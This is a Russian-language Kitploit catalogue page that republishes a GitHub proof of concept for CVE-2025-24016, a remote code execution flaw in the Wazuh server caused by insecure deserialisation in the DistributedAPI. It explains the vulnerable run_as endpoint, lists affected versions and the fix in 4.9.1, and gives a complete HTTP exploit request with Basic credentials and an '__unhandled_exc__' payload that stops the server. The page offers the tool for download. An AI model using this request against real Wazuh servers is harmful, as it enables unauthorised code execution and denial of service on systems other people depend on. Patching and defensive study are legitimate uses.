Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24016 — CVE-2025-24016: RCE в сервере Wazuh! Удалённое выполнение кода | Kitploit
Инструменты/GitHubGitHub/glostarrx1/cve-2025-24016
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubglostarrx1/cve-2025-24016

CVE-2025-24016

CVE-2025-24016: RCE в сервере Wazuh! Удалённое выполнение кода

Репозиторий
1621 год назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Удаленное выполнение кода в Wazuh (RCE) - PoC

Обзор уязвимости

В этом репозитории демонстрируется уязвимость удаленного выполнения кода (RCE) в сервере Wazuh, вызванная небезопасной десериализацией в пакете wazuh-manager. Уязвимость позволяет удаленным злоумышленникам, имеющим доступ к API (скомпрометированная панель управления, серверы Wazuh в кластере или определенные конфигурации со скомпрометированными агентами), выполнять произвольный код на сервере.

Затронутые версии

  • wazuh-manager версии >= 4.4.0
  • Исправлено в версии >= 4.9.1

Описание

Уязвимость находится в API Wazuh, где параметры в DistributedAPI сериализуются в JSON и десериализуются с помощью as_wazuh_object в файле . Злоумышленник может воспользоваться этой уязвимостью, внедряя несанитизированный словарь в DAPI-запросы, что может привести к выполнению произвольного Python-кода.

framework/wazuh/core/cluster/common.py

RCE можно вызвать через конечную точку run_as, которая позволяет злоумышленнику управлять аргументом auth_context. Создав вредоносный запрос, можно выполнить произвольный код на главном сервере.

Доказательство концепции (PoC)

Чтобы воспроизвести эту уязвимость через API сервера, выполните следующие шаги.

Запрос Burp Suite PoC

  1. Запрос Burp Suite для запуска уязвимости:
root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

Solution Image

  1. Пояснение к запросу:
  • Заголовок Authorization: Это авторизация в формате Base64 (wazuh-wui:MyS3cr37P450r.*-).
  • Полезная нагрузка (payload): Вредоносная нагрузка содержит несанитизированное исключение __unhandled_exc__, которое запускает выполнение произвольного Python-кода (в данном случае — exit).

Воздействие

  • Удаленное выполнение кода (RCE): Эта уязвимость позволяет злоумышленникам выполнять произвольный код на сервере Wazuh, затрагивая версии >= 4.4.0 вплоть до 4.9.0 (еще не исправленные).
  • Потенциальный отказ в обслуживании (DoS): В этом PoC вызывается функция exit, что приводит к остановке сервера Wazuh.

Меры по устранению

Для защиты своих систем обновитесь до версии Wazuh >= 4.9.1, в которой эта проблема исправлена.

Скачать инструмент